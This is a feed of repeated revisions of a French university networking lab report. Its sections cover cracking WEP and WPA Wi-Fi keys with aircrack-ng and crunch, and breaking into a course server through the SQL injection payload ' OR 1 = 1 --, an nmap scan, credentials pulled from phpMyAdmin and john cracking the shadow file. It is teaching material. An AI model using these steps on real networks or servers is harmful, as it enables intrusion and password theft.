On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54100</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54100"/>
				<updated>2020-11-30T15:35:25Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Installation de la machine virtuelle=&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54096</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54096"/>
				<updated>2020-11-30T15:33:18Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
===Installation de la machine virtuelle===&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write data -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54095</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54095"/>
				<updated>2020-11-30T15:33:03Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
===Installation de la machine virtuelle===&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write data -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54093</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54093"/>
				<updated>2020-11-30T15:32:27Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
Adressage&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
===Installation de la machine virtuelle===&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write data -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54092</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54092"/>
				<updated>2020-11-30T15:32:03Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
Informations d'adressage&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
===Installation de la machine virtuelle===&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write data -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54085</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
